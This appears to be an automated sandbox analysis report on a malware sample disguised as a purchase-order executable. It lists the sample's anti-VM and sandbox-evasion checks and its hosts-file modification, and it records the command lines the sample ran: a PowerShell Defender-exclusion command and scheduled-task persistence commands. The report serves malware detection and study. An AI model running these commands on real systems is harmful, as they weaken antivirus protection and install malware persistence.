                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6592Thread sleep time: -45733s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 2376Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436Thread sleep count: 4140 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436Thread sleep count: 4455 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7088Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2400Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7016Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7036Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920Thread sleep count: 3147 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -59500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920Thread sleep count: 4125 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -52688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -48376s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -44594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5660Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5664Thread sleep count: 4186 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7104Thread sleep count: 2293 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6818Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1776Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWindow / User API: threadDelayed 4140Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWindow / User API: threadDelayed 4455Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 3147
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 4125
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 4186
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 2293
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 45733Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634CEB0 LdrInitializeThunk,25_2_0634CEB0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: jVULYR.exe.9.dr, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformationJump to behavior
